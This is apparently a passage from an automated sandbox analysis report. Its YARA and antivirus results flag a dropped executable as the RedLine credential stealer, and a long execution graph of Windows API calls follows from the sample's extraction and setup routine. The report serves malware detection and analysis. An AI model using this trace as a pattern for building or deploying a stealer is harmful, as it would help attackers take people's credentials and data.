                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, Author: Joe Security
                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, Author: ditekSHen
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                        • Detection: 77%, ReversingLabs
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:26.9%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                          Signature Coverage:28.3%
                                                                                                                                                                                                          Total number of Nodes:967
                                                                                                                                                                                                          Total number of Limit Nodes:42
                                                                                                                                                                                                          execution_graph 3128 866c03 3129 866c17 _exit 3128->3129 3130 866c1e 3128->3130 3129->3130 3131 866c27 _cexit 3130->3131 3132 866c32 3130->3132 3131->3132 2196 864cc0 GlobalFree 2197 866f40 SetUnhandledExceptionFilter 3133 864bc0 3134 864c05 3133->3134 3136 864bd7 3133->3136 3135 864c1b SetFilePointer 3134->3135 3134->3136 3135->3136 3137 8630c0 3138 8630de CallWindowProcA 3137->3138 3139 8630ce 3137->3139 3140 8630da 3138->3140 3139->3138 3139->3140 3141 8663c0 3142 866407 3141->3142 3143 86658a CharPrevA 3142->3143 3144 866415 CreateFileA 3143->3144 3145 86643a 3144->3145 3146 866448 WriteFile 3144->3146 3149 866ce0 4 API calls 3145->3149 3147 866465 CloseHandle 3146->3147 3147->3145 3150 86648f 3149->3150 3151 863100 3152 8631b0 3151->3152 3153 863111 3151->3153 3155 863141 3152->3155 3156 8631b9 SendDlgItemMessageA 3152->3156 3154 86311d 3153->3154 3157 863149 GetDesktopWindow 3153->3157 3154->3155 3158 863138 EndDialog 3154->3158 3156->3155 3161 8643d0 6 API calls 3157->3161 3158->3155 3163 864463 SetWindowPos 3161->3163 3164 866ce0 4 API calls 3163->3164 3165 86315d 6 API calls 3164->3165 3165->3155 3166 864200 3167 86421e 3166->3167 3168 86420b SendMessageA 3166->3168 3168->3167 2198 864cd0 2199 864cf4 2198->2199 2200 864d0b 2198->2200 2201 864d02 2199->2201 2202 864b60 FindCloseChangeNotification 2199->2202 2200->2201 2204 864dcb 2200->2204 2207 864d25 2200->2207 2255 866ce0 2201->2255 2202->2201 2205 864dd4 SetDlgItemTextA 2204->2205 2208 864de3 2204->2208 2205->2208 2206 864e95 2207->2201 2221 864c37 2207->2221 2208->2201 2229 86476d 2208->2229 2212 864e38 2212->2201 2238 864980 2212->2238 2217 864e64 2246 8647e0 LocalAlloc 2217->2246 2220 864e6f 2220->2201 2222 864c4c DosDateTimeToFileTime 2221->2222 2223 864c88 2221->2223 2222->2223 2224 864c5e LocalFileTimeToFileTime 2222->2224 2223->2201 2226 864b60 2223->2226 2224->2223 2225 864c70 SetFileTime 2224->2225 2225->2223 2227 864b76 SetFileAttributesA 2226->2227 2228 864b92 FindCloseChangeNotification 2226->2228 2227->2201 2228->2227 2260 8666ae GetFileAttributesA 2229->2260 2231 86477b 2231->2212 2232 8647cc SetFileAttributesA 2234 8647db 2232->2234 2234->2212 2237 8647c2 2237->2232 2239 864990 2238->2239 2240 8649a5 2239->2240 2241 8649c2 lstrcmpA 2239->2241 2242 8644b9 20 API calls 2240->2242 2243 8649ba 2241->2243 2244 864a0e 2241->2244 2242->2243 2243->2201 2243->2217 2244->2243 2325 86487a 2244->2325 2247 8647f6 2246->2247 2248 86480f LocalAlloc 2246->2248 2249 8644b9 20 API calls 2247->2249 2251 864831 2248->2251 2254 86480b 2248->2254 2249->2254 2252 8644b9 20 API calls 2251->2252 2253 864846 LocalFree 2252->2253 2253->2254 2254->2220 2256 866ce8 2255->2256 2257 866ceb 2255->2257 2256->2206 2338 866cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2257->2338 2259 866e26 2259->2206 2261 864777 2260->2261 2261->2231 2261->2232 2262 866517 FindResourceA 2261->2262 2263 866536 LoadResource 2262->2263 2264 86656b 2262->2264 2263->2264 2265 866544 DialogBoxIndirectParamA FreeResource 2263->2265 2269 8644b9 2264->2269 2265->2264 2267 8647b1 2265->2267 2267->2232 2267->2234 2267->2237 2270 8644fe LoadStringA 2269->2270 2271 86455a 2269->2271 2272 864527 2270->2272 2273 864562 2270->2273 2275 866ce0 4 API calls 2271->2275 2298 86681f 2272->2298 2279 8645c9 2273->2279 2285 86457e 2273->2285 2277 864689 2275->2277 2277->2267 2278 864536 MessageBoxA 2278->2271 2281 864607 LocalAlloc 2279->2281 2282 8645cd LocalAlloc 2279->2282 2281->2271 2293 8645c4 2281->2293 2282->2271 2286 8645f3 2282->2286 2285->2285 2288 864596 LocalAlloc 2285->2288 2290 86171e _vsnprintf 2286->2290 2287 86462d MessageBeep 2291 86681f 10 API calls 2287->2291 2288->2271 2289 8645af 2288->2289 2315 86171e 2289->2315 2290->2293 2294 86463b 2291->2294 2293->2287 2295 864645 MessageBoxA LocalFree 2294->2295 2296 8667c9 EnumResourceLanguagesA 2294->2296 2295->2271 2296->2295 2299 866857 GetVersionExA 2298->2299 2308 86691a 2298->2308 2301 86687c 2299->2301 2299->2308 2300 866ce0 4 API calls 2302 86452c 2300->2302 2303 8668a5 GetSystemMetrics 2301->2303 2301->2308 2302->2278 2309 8667c9 2302->2309 2304 8668b5 RegOpenKeyExA 2303->2304 2303->2308 2305 8668d6 RegQueryValueExA RegCloseKey 2304->2305 2304->2308 2306 86690c 2305->2306 2305->2308 2319 8666f9 2306->2319 2308->2300 2310 866803 2309->2310 2311 8667e2 2309->2311 2310->2278 2323 866793 EnumResourceLanguagesA 2311->2323 2313 8667f5 2313->2310 2324 866793 EnumResourceLanguagesA 2313->2324 2316 86172d 2315->2316 2317 86173d _vsnprintf 2316->2317 2318 86175d 2316->2318 2317->2318 2318->2293 2321 86670f 2319->2321 2320 866740 CharNextA 2320->2321 2321->2320 2322 86674b 2321->2322 2322->2308 2323->2313 2324->2310 2326 8648a2 CreateFileA 2325->2326 2328 864908 2326->2328 2329 8648e9 2326->2329 2328->2243 2329->2328 2330 8648ee 2329->2330 2333 86490c 2330->2333 2334 8648f5 CreateFileA 2333->2334 2336 864917 2333->2336 2334->2328 2335 864962 CharNextA 2335->2336 2336->2334 2336->2335 2337 864953 CreateDirectoryA 2336->2337 2337->2335 2338->2259 2339 864ad0 2347 863680 2339->2347 2342 864aee WriteFile 2344 864b0f 2342->2344 2345 864b14 2342->2345 2343 864ae9 2345->2344 2346 864b3b SendDlgItemMessageA 2345->2346 2346->2344 2348 863691 MsgWaitForMultipleObjects 2347->2348 2349 8636e8 2348->2349 2350 8636a9 PeekMessageA 2348->2350 2349->2342 2349->2343 2350->2348 2351 8636bc 2350->2351 2351->2348 2351->2349 2352 8636c7 DispatchMessageA 2351->2352 2353 8636d1 PeekMessageA 2351->2353 2352->2353 2353->2351 3169 863210 3170 863227 3169->3170 3171 86328e EndDialog 3169->3171 3172 863235 3170->3172 3173 8633e2 GetDesktopWindow 3170->3173 3187 863239 3171->3187 3177 86324c 3172->3177 3178 8632dd GetDlgItemTextA 3172->3178 3172->3187 3175 8643d0 11 API calls 3173->3175 3176 8633f1 SetWindowTextA SendDlgItemMessageA 3175->3176 3179 86341f GetDlgItem EnableWindow 3176->3179 3176->3187 3181 8632c5 EndDialog 3177->3181 3182 863251 3177->3182 3180 863366 3178->3180 3188 8632fc 3178->3188 3179->3187 3184 8644b9 20 API calls 3180->3184 3181->3187 3183 86325c LoadStringA 3182->3183 3182->3187 3185 863294 3183->3185 3186 86327b 3183->3186 3184->3187 3207 864224 LoadLibraryA 3185->3207 3191 8644b9 20 API calls 3186->3191 3188->3180 3190 863331 GetFileAttributesA 3188->3190 3193 86333f 3190->3193 3194 86337c 3190->3194 3191->3171 3197 8644b9 20 API calls 3193->3197 3196 86658a CharPrevA 3194->3196 3195 8632a5 SetDlgItemTextA 3195->3186 3195->3187 3198 86338d 3196->3198 3199 863351 3197->3199 3200 8658c8 27 API calls 3198->3200 3199->3187 3201 86335a CreateDirectoryA 3199->3201 3202 863394 3200->3202 3201->3180 3201->3194 3202->3180 3203 8633a4 3202->3203 3204 8633c7 EndDialog 3203->3204 3205 86597d 34 API calls 3203->3205 3204->3187 3206 8633c3 3205->3206 3206->3187 3206->3204 3208 864246 GetProcAddress 3207->3208 3209 8643b2 3207->3209 3210 8643a4 FreeLibrary 3208->3210 3211 86425d GetProcAddress 3208->3211 3213 8644b9 20 API calls 3209->3213 3210->3209 3211->3210 3212 864274 GetProcAddress 3211->3212 3212->3210 3214 86428b 3212->3214 3216 86329d 3213->3216 3215 864295 GetTempPathA 3214->3215 3221 8642e1 3214->3221 3217 8642ad 3215->3217 3216->3187 3216->3195 3217->3217 3218 8642b4 CharPrevA 3217->3218 3219 8642d0 CharPrevA 3218->3219 3218->3221 3219->3221 3220 864390 FreeLibrary 3220->3216 3221->3220 3222 864a50 3223 864a66 3222->3223 3224 864a9f ReadFile 3222->3224 3225 864abb 3223->3225 3226 864a82 memcpy 3223->3226 3224->3225 3226->3225 3227 863450 3228 8634d3 EndDialog 3227->3228 3229 86345e 3227->3229 3231 86346a 3228->3231 3230 86349a GetDesktopWindow 3229->3230 3233 863465 3229->3233 3232 8643d0 11 API calls 3230->3232 3234 8634ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3232->3234 3233->3231 3235 86348c EndDialog 3233->3235 3234->3231 3235->3231 2354 864ca0 GlobalAlloc 2355 866a60 2372 867155 2355->2372 2357 866a65 2358 866a76 GetStartupInfoW 2357->2358 2359 866a93 2358->2359 2360 866aa8 2359->2360 2361 866aaf Sleep 2359->2361 2362 866ac7 _amsg_exit 2360->2362 2364 866ad1 2360->2364 2361->2359 2362->2364 2363 866b13 _initterm 2368 866b2e __IsNonwritableInCurrentImage 2363->2368 2364->2363 2366 866af4 2364->2366 2364->2368 2365 866bd6 _ismbblead 2365->2368 2367 866c1e 2367->2366 2369 866c27 _cexit 2367->2369 2368->2365 2368->2367 2371 866bbe exit 2368->2371 2377 862bfb GetVersion 2368->2377 2369->2366 2371->2368 2373 86717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2372->2373 2374 86717a 2372->2374 2375 8671cd 2373->2375 2374->2373 2376 8671e2 2374->2376 2375->2376 2376->2357 2378 862c50 2377->2378 2379 862c0f 2377->2379 2394 862caa memset memset memset 2378->2394 2379->2378 2381 862c13 GetModuleHandleW 2379->2381 2381->2378 2383 862c22 GetProcAddress 2381->2383 2383->2378 2389 862c34 2383->2389 2384 862c8e 2386 862c97 CloseHandle 2384->2386 2387 862c9e 2384->2387 2386->2387 2387->2368 2389->2378 2392 862c89 2489 861f90 2392->2489 2506 86468f FindResourceA SizeofResource 2394->2506 2397 862e30 2400 8644b9 20 API calls 2397->2400 2398 862d2d CreateEventA SetEvent 2399 86468f 7 API calls 2398->2399 2402 862d57 2399->2402 2401 862f06 2400->2401 2405 866ce0 4 API calls 2401->2405 2403 862d7d 2402->2403 2404 862d5b 2402->2404 2406 862e1f 2403->2406 2411 86468f 7 API calls 2403->2411 2407 8644b9 20 API calls 2404->2407 2410 862c62 2405->2410 2511 865c9e 2406->2511 2409 862d6e 2407->2409 2409->2401 2410->2384 2435 862f1d 2410->2435 2413 862d9f 2411->2413 2413->2404 2415 862da3 CreateMutexA 2413->2415 2414 862e3a 2416 862e52 FindResourceA 2414->2416 2417 862e43 2414->2417 2415->2406 2418 862dbd GetLastError 2415->2418 2421 862e64 LoadResource 2416->2421 2422 862e6e 2416->2422 2537 862390 2417->2537 2418->2406 2420 862dca 2418->2420 2423 862dd5 2420->2423 2424 862dea 2420->2424 2421->2422 2422->2409 2552 8636ee GetVersionExA 2422->2552 2425 8644b9 20 API calls 2423->2425 2426 8644b9 20 API calls 2424->2426 2427 862de8 2425->2427 2428 862dff 2426->2428 2430 862e04 CloseHandle 2427->2430 2428->2406 2428->2430 2430->2401 2434 866517 24 API calls 2434->2409 2436 862f3f 2435->2436 2437 862f6c 2435->2437 2438 862f5f 2436->2438 2641 8651e5 2436->2641 2661 865164 2437->2661 2794 863a3f 2438->2794 2442 862f71 2472 863041 2442->2472 2676 8655a0 2442->2676 2447 866ce0 4 API calls 2449 862c6b 2447->2449 2448 862f86 GetSystemDirectoryA 2450 86658a CharPrevA 2448->2450 2476 8652b6 2449->2476 2451 862fab LoadLibraryA 2450->2451 2452 862ff7 FreeLibrary 2451->2452 2453 862fc0 GetProcAddress 2451->2453 2455 863006 2452->2455 2456 863017 SetCurrentDirectoryA 2452->2456 2453->2452 2454 862fd6 DecryptFileA 2453->2454 2454->2452 2464 862ff0 2454->2464 2455->2456 2726 86621e GetWindowsDirectoryA 2455->2726 2457 863026 2456->2457 2461 863054 2456->2461 2458 8644b9 20 API calls 2457->2458 2463 863037 2458->2463 2460 863061 2466 86307a 2460->2466 2460->2472 2746 86256d 2460->2746 2461->2460 2737 863b26 2461->2737 2813 866285 GetLastError 2463->2813 2464->2452 2469 863098 2466->2469 2757 863ba2 2466->2757 2469->2472 2474 8630af 2469->2474 2472->2447 2815 864169 2474->2815 2477 8652d6 2476->2477 2478 865316 2476->2478 2479 865300 LocalFree LocalFree 2477->2479 2481 8652eb SetFileAttributesA DeleteFileA 2477->2481 2482 865374 2478->2482 2486 86535e SetCurrentDirectoryA 2478->2486 2487 8665e8 4 API calls 2478->2487 2479->2477 2479->2478 2480 86538c 2483 866ce0 4 API calls 2480->2483 2481->2479 2482->2480 3124 861fe1 2482->3124 2485 862c72 2483->2485 2485->2384 2485->2392 2488 862390 13 API calls 2486->2488 2487->2486 2488->2482 2490 861f9f 2489->2490 2491 861f9a 2489->2491 2493 861fc0 2490->2493 2494 8644b9 20 API calls 2490->2494 2497 861fd9 2490->2497 2492 861ea7 15 API calls 2491->2492 2492->2490 2495 861fcf ExitWindowsEx 2493->2495 2496 861ee2 GetCurrentProcess OpenProcessToken 2493->2496 2493->2497 2494->2493 2495->2497 2499 861f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2496->2499 2500 861f0e 2496->2500 2497->2384 2499->2500 2501 861f6b ExitWindowsEx 2499->2501 2503 8644b9 20 API calls 2500->2503 2501->2500 2502 861f1f 2501->2502 2504 866ce0 4 API calls 2502->2504 2503->2502 2505 861f8c 2504->2505 2505->2384 2507 8646b6 2506->2507 2508 862d1a 2506->2508 2507->2508 2509 8646be FindResourceA LoadResource LockResource 2507->2509 2508->2397 2508->2398 2509->2508 2510 8646df memcpy_s FreeResource 2509->2510 2510->2508 2516 865e17 2511->2516 2521 865cc3 2511->2521 2512 866ce0 4 API calls 2514 862e2c 2512->2514 2513 865ced CharNextA 2513->2521 2514->2397 2514->2414 2515 865dec GetModuleFileNameA 2515->2516 2517 865e0a 2515->2517 2516->2512 2587 8666c8 2517->2587 2519 866218 2596 866e2a 2519->2596 2521->2513 2521->2516 2521->2519 2523 865e36 CharUpperA 2521->2523 2529 865dd0 2521->2529 2530 865f9f CharUpperA 2521->2530 2531 865f59 CompareStringA 2521->2531 2532 866003 CharUpperA 2521->2532 2533 865edc CharUpperA 2521->2533 2534 8660a2 CharUpperA 2521->2534 2535 86667f IsDBCSLeadByte CharNextA 2521->2535 2592 86658a 2521->2592 2523->2521 2524 8661d0 2523->2524 2525 8644b9 20 API calls 2524->2525 2526 8661e7 2525->2526 2527 8661f7 ExitProcess 2526->2527 2528 8661f0 CloseHandle 2526->2528 2528->2527 2529->2515 2529->2516 2530->2521 2531->2521 2532->2521 2533->2521 2534->2521 2535->2521 2538 8624cb 2537->2538 2541 8623b9 2537->2541 2539 866ce0 4 API calls 2538->2539 2540 8624dc 2539->2540 2540->2409 2541->2538 2542 8623e9 FindFirstFileA 2541->2542 2542->2538 2550 862407 2542->2550 2543 862421 lstrcmpA 2545 862431 lstrcmpA 2543->2545 2546 8624a9 FindNextFileA 2543->2546 2544 862479 2547 862488 SetFileAttributesA DeleteFileA 2544->2547 2545->2546 2545->2550 2548 8624bd FindClose RemoveDirectoryA 2546->2548 2546->2550 2547->2546 2548->2538 2549 86658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2546 2550->2549 2551 862390 5 API calls 2550->2551 2551->2550 2556 863737 2552->2556 2557 86372d 2552->2557 2553 8644b9 20 API calls 2566 8639fc 2553->2566 2554 866ce0 4 API calls 2555 862e92 2554->2555 2555->2401 2555->2409 2567 8618a3 2555->2567 2556->2557 2559 8638a4 2556->2559 2556->2566 2603 8628e8 2556->2603 2557->2553 2557->2566 2559->2557 2560 8639c1 MessageBeep 2559->2560 2559->2566 2561 86681f 10 API calls 2560->2561 2562 8639ce 2561->2562 2563 8639d8 MessageBoxA 2562->2563 2564 8667c9 EnumResourceLanguagesA 2562->2564 2563->2566 2564->2563 2566->2554 2568 8618d5 2567->2568 2569 8619b8 2567->2569 2632 8617ee LoadLibraryA 2568->2632 2571 866ce0 4 API calls 2569->2571 2572 8619d5 2571->2572 2572->2409 2572->2434 2574 8618e5 GetCurrentProcess OpenProcessToken 2574->2569 2575 861900 GetTokenInformation 2574->2575 2576 8619aa CloseHandle 2575->2576 2577 861918 GetLastError 2575->2577 2576->2569 2577->2576 2578 861927 LocalAlloc 2577->2578 2579 861938 GetTokenInformation 2578->2579 2580 8619a9 2578->2580 2581 8619a2 LocalFree 2579->2581 2582 86194e AllocateAndInitializeSid 2579->2582 2580->2576 2581->2580 2582->2581 2585 86196e 2582->2585 2583 861999 FreeSid 2583->2581 2584 861975 EqualSid 2584->2585 2586 86198c 2584->2586 2585->2583 2585->2584 2585->2586 2586->2583 2588 8666d5 2587->2588 2589 8666f3 2588->2589 2591 8666e5 CharNextA 2588->2591 2599 866648 2588->2599 2589->2516 2591->2588 2593 86659b 2592->2593 2593->2593 2594 8665ab 2593->2594 2595 8665b8 CharPrevA 2593->2595 2594->2521 2595->2594 2602 866cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 86621d 2600 866668 2599->2600 2601 86665d IsDBCSLeadByte 2599->2601 2600->2588 2601->2600 2602->2598 2604 862a62 2603->2604 2611 86290d 2603->2611 2605 862a75 2604->2605 2606 862a6e GlobalFree 2604->2606 2605->2559 2606->2605 2608 862955 GlobalAlloc 2608->2604 2609 862968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 862a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 862a80 GlobalUnlock 2611->2612 2613 862773 2611->2613 2612->2604 2614 8628b2 2613->2614 2615 8627a3 CharUpperA CharNextA CharNextA 2613->2615 2616 8628b7 GetSystemDirectoryA 2614->2616 2615->2616 2617 8627db 2615->2617 2620 8628bf 2616->2620 2618 8627e3 2617->2618 2619 8628a8 GetWindowsDirectoryA 2617->2619 2624 86658a CharPrevA 2618->2624 2619->2620 2621 8628d2 2620->2621 2622 86658a CharPrevA 2620->2622 2623 866ce0 4 API calls 2621->2623 2622->2621 2625 8628e2 2623->2625 2626 862810 RegOpenKeyExA 2624->2626 2625->2611 2626->2620 2627 862837 RegQueryValueExA 2626->2627 2628 86285c 2627->2628 2629 86289a RegCloseKey 2627->2629 2630 862867 ExpandEnvironmentStringsA 2628->2630 2631 86287a 2628->2631 2629->2620 2630->2631 2631->2629 2633 861826 GetProcAddress 2632->2633 2634 861890 2632->2634 2635 861889 FreeLibrary 2633->2635 2636 861839 AllocateAndInitializeSid 2633->2636 2637 866ce0 4 API calls 2634->2637 2635->2634 2636->2635 2640 86185f FreeSid 2636->2640 2638 86189f 2637->2638 2638->2569 2638->2574 2640->2635 2642 86468f 7 API calls 2641->2642 2643 8651f9 LocalAlloc 2642->2643 2644 86522d 2643->2644 2645 86520d 2643->2645 2647 86468f 7 API calls 2644->2647 2646 8644b9 20 API calls 2645->2646 2648 86521e 2646->2648 2649 86523a 2647->2649 2650 866285 GetLastError 2648->2650 2651 865262 lstrcmpA 2649->2651 2652 86523e 2649->2652 2660 865223 2650->2660 2653 865272 LocalFree 2651->2653 2654 86527e 2651->2654 2655 8644b9 20 API calls 2652->2655 2658 862f4d 2653->2658 2656 8644b9 20 API calls 2654->2656 2657 86524f LocalFree 2655->2657 2659 865290 LocalFree 2656->2659 2657->2658 2658->2437 2658->2438 2658->2472 2659->2660 2660->2658 2662 86468f 7 API calls 2661->2662 2663 865175 2662->2663 2664 86517a 2663->2664 2665 8651af 2663->2665 2667 8644b9 20 API calls 2664->2667 2666 86468f 7 API calls 2665->2666 2668 8651c0 2666->2668 2669 86518d 2667->2669 2828 866298 2668->2828 2669->2442 2673 8651e1 2673->2442 2674 8651ce 2675 8644b9 20 API calls 2674->2675 2675->2669 2677 86468f 7 API calls 2676->2677 2678 8655c7 LocalAlloc 2677->2678 2679 8655fd 2678->2679 2680 8655db 2678->2680 2682 86468f 7 API calls 2679->2682 2681 8644b9 20 API calls 2680->2681 2683 8655ec 2681->2683 2684 86560a 2682->2684 2685 866285 GetLastError 2683->2685 2686 865632 lstrcmpA 2684->2686 2687 86560e 2684->2687 2690 8655f1 2685->2690 2688 865645 2686->2688 2689 86564b LocalFree 2686->2689 2691 8644b9 20 API calls 2687->2691 2688->2689 2692 865696 2689->2692 2693 86565b 2689->2693 2714 8655f6 2690->2714 2694 86561f LocalFree 2691->2694 2695 86589f 2692->2695 2698 8656ae GetTempPathA 2692->2698 2699 865467 49 API calls 2693->2699 2694->2714 2696 866517 24 API calls 2695->2696 2696->2714 2697 866ce0 4 API calls 2700 862f7e 2697->2700 2701 8656eb 2698->2701 2702 8656c3 2698->2702 2704 865678 2699->2704 2700->2448 2700->2472 2708 865717 GetDriveTypeA 2701->2708 2709 86586c GetWindowsDirectoryA 2701->2709 2701->2714 2840 865467 2702->2840 2706 865680 2704->2706 2704->2714 2707 8644b9 20 API calls 2706->2707 2707->2690 2712 865730 GetFileAttributesA 2708->2712 2724 86572b 2708->2724 2874 86597d GetCurrentDirectoryA SetCurrentDirectoryA 2709->2874 2712->2724 2714->2697 2715 86597d 34 API calls 2715->2724 2716 865467 49 API calls 2716->2701 2717 862630 21 API calls 2717->2724 2719 8657c1 GetWindowsDirectoryA 2719->2724 2720 86658a CharPrevA 2721 8657e8 GetFileAttributesA 2720->2721 2722 8657fa CreateDirectoryA 2721->2722 2721->2724 2722->2724 2723 865827 SetFileAttributesA 2723->2724 2724->2708 2724->2709 2724->2712 2724->2714 2724->2715 2724->2717 2724->2719 2724->2720 2724->2723 2725 865467 49 API calls 2724->2725 2870 866952 2724->2870 2725->2724 2727 866268 2726->2727 2728 866249 2726->2728 2729 86597d 34 API calls 2727->2729 2730 8644b9 20 API calls 2728->2730 2731 866277 2729->2731 2732 86625a 2730->2732 2733 866ce0 4 API calls 2731->2733 2734 866285 GetLastError 2732->2734 2735 863013 2733->2735 2736 86625f 2734->2736 2735->2456 2735->2472 2736->2731 2738 863b2d 2737->2738 2738->2738 2739 863b72 2738->2739 2741 863b53 2738->2741 2941 864fe0 2739->2941 2742 866517 24 API calls 2741->2742 2743 863b70 2742->2743 2744 863b7b 2743->2744 2745 866298 10 API calls 2743->2745 2744->2460 2745->2744 2747 862622 2746->2747 2748 862583 2746->2748 2971 8624e0 GetWindowsDirectoryA 2747->2971 2749 8625e8 RegOpenKeyExA 2748->2749 2751 86258b 2748->2751 2752 8625e3 2749->2752 2753 862609 RegQueryInfoKeyA 2749->2753 2751->2752 2754 86259b RegOpenKeyExA 2751->2754 2752->2466 2755 8625d1 RegCloseKey 2753->2755 2754->2752 2756 8625bc RegQueryValueExA 2754->2756 2755->2752 2756->2755 2758 863bdb 2757->2758 2774 863bec 2757->2774 2760 86468f 7 API calls 2758->2760 2759 863c03 memset 2759->2774 2760->2774 2761 863d13 2762 8644b9 20 API calls 2761->2762 2763 863d26 2762->2763 2764 863f4d 2763->2764 2766 866ce0 4 API calls 2764->2766 2767 863f60 2766->2767 2767->2469 2768 863fd7 2768->2764 3069 862267 2768->3069 2769 863d7b CompareStringA 2769->2768 2769->2774 2770 863fab 2773 8644b9 20 API calls 2770->2773 2776 863fbe LocalFree 2773->2776 2774->2759 2774->2761 2774->2764 2774->2768 2774->2769 2774->2770 2777 863f46 LocalFree 2774->2777 2778 863f1e LocalFree 2774->2778 2779 86468f 7 API calls 2774->2779 2781 863cc7 CompareStringA 2774->2781 2791 863e10 2774->2791 2979 861ae8 2774->2979 3019 86202a memset memset RegCreateKeyExA 2774->3019 3045 863fef 2774->3045 2776->2764 2777->2764 2778->2768 2778->2774 2779->2774 2781->2774 2782 863f92 2785 8644b9 20 API calls 2782->2785 2783 863e1f GetProcAddress 2784 863f64 2783->2784 2783->2791 2786 8644b9 20 API calls 2784->2786 2787 863fa9 2785->2787 2788 863f75 FreeLibrary 2786->2788 2789 863f7c LocalFree 2787->2789 2788->2789 2790 866285 GetLastError 2789->2790 2790->2763 2791->2782 2791->2783 2792 863f40 FreeLibrary 2791->2792 2793 863eff FreeLibrary 2791->2793 3059 866495 2791->3059 2792->2777 2793->2778 2795 86468f 7 API calls 2794->2795 2796 863a55 LocalAlloc 2795->2796 2797 863a8e 2796->2797 2798 863a6c 2796->2798 2799 86468f 7 API calls 2797->2799 2800 8644b9 20 API calls 2798->2800 2801 863a98 2799->2801 2802 863a7d 2800->2802 2803 863ac5 lstrcmpA 2801->2803 2804 863a9c 2801->2804 2805 866285 GetLastError 2802->2805 2807 863b0d LocalFree 2803->2807 2808 863ada 2803->2808 2806 8644b9 20 API calls 2804->2806 2809 862f64 2805->2809 2810 863aad LocalFree 2806->2810 2807->2809 2811 866517 24 API calls 2808->2811 2809->2437 2809->2472 2810->2809 2812 863aec LocalFree 2811->2812 2812->2809 2814 86303c 2813->2814 2814->2472 2816 86468f 7 API calls 2815->2816 2817 86417d LocalAlloc 2816->2817 2818 864195 2817->2818 2819 8641a8 2817->2819 2820 8644b9 20 API calls 2818->2820 2821 86468f 7 API calls 2819->2821 2823 8641a6 2820->2823 2822 8641b5 2821->2822 2824 8641c5 lstrcmpA 2822->2824 2825 8641b9 2822->2825 2823->2472 2824->2825 2826 8641e6 LocalFree 2824->2826 2827 8644b9 20 API calls 2825->2827 2826->2823 2827->2826 2829 86171e _vsnprintf 2828->2829 2839 8662c9 FindResourceA 2829->2839 2831 866353 2834 866ce0 4 API calls 2831->2834 2832 8662cb LoadResource LockResource 2832->2831 2833 8662e0 2832->2833 2836 866355 FreeResource 2833->2836 2837 86631b FreeResource 2833->2837 2835 8651ca 2834->2835 2835->2673 2835->2674 2836->2831 2838 86171e _vsnprintf 2837->2838 2838->2839 2839->2831 2839->2832 2841 86551a 2840->2841 2842 86548a 2840->2842 2912 8658c8 2841->2912 2901 8653a1 2842->2901 2844 865581 2848 866ce0 4 API calls 2844->2848 2847 865495 2847->2844 2851 8654c2 GetSystemInfo 2847->2851 2852 86550c 2847->2852 2853 86559a 2848->2853 2849 86554d 2849->2844 2858 86597d 34 API calls 2849->2858 2850 86553b CreateDirectoryA 2854 865577 2850->2854 2855 865547 2850->2855 2860 8654da 2851->2860 2856 86658a CharPrevA 2852->2856 2853->2714 2864 862630 GetWindowsDirectoryA 2853->2864 2857 866285 GetLastError 2854->2857 2855->2849 2856->2841 2859 86557c 2857->2859 2861 86555c 2858->2861 2859->2844 2860->2852 2862 86658a CharPrevA 2860->2862 2861->2844 2863 865568 RemoveDirectoryA 2861->2863 2862->2852 2863->2844 2865 86265e 2864->2865 2866 86266f 2864->2866 2867 8644b9 20 API calls 2865->2867 2868 866ce0 4 API calls 2866->2868 2867->2866 2869 862687 2868->2869 2869->2701 2869->2716 2871 8669a1 2870->2871 2872 86696e GetDiskFreeSpaceA 2870->2872 2871->2724 2872->2871 2873 866989 MulDiv 2872->2873 2873->2871 2875 8659dd GetDiskFreeSpaceA 2874->2875 2876 8659bb 2874->2876 2877 865ba1 memset 2875->2877 2878 865a21 MulDiv 2875->2878 2879 8644b9 20 API calls 2876->2879 2881 866285 GetLastError 2877->2881 2878->2877 2882 865a50 GetVolumeInformationA 2878->2882 2880 8659cc 2879->2880 2883 866285 GetLastError 2880->2883 2884 865bbc GetLastError FormatMessageA 2881->2884 2885 865ab5 SetCurrentDirectoryA 2882->2885 2886 865a6e memset 2882->2886 2887 8659d1 2883->2887 2888 865be3 2884->2888 2894 865acc 2885->2894 2889 866285 GetLastError 2886->2889 2898 865b94 2887->2898 2890 8644b9 20 API calls 2888->2890 2891 865a89 GetLastError FormatMessageA 2889->2891 2892 865bf5 SetCurrentDirectoryA 2890->2892 2891->2888 2892->2898 2893 866ce0 4 API calls 2895 865c11 2893->2895 2896 865b0a 2894->2896 2899 865b20 2894->2899 2895->2701 2897 8644b9 20 API calls 2896->2897 2897->2887 2898->2893 2899->2898 2924 86268b 2899->2924 2903 8653bf 2901->2903 2902 86171e _vsnprintf 2902->2903 2903->2902 2904 86658a CharPrevA 2903->2904 2907 865415 GetTempFileNameA 2903->2907 2905 8653fa RemoveDirectoryA GetFileAttributesA 2904->2905 2905->2903 2906 86544f CreateDirectoryA 2905->2906 2906->2907 2908 86543a 2906->2908 2907->2908 2909 865429 DeleteFileA CreateDirectoryA 2907->2909 2910 866ce0 4 API calls 2908->2910 2909->2908 2911 865449 2910->2911 2911->2847 2913 8658d8 2912->2913 2913->2913 2914 8658df LocalAlloc 2913->2914 2915 8658f3 2914->2915 2917 865919 2914->2917 2916 8644b9 20 API calls 2915->2916 2923 865906 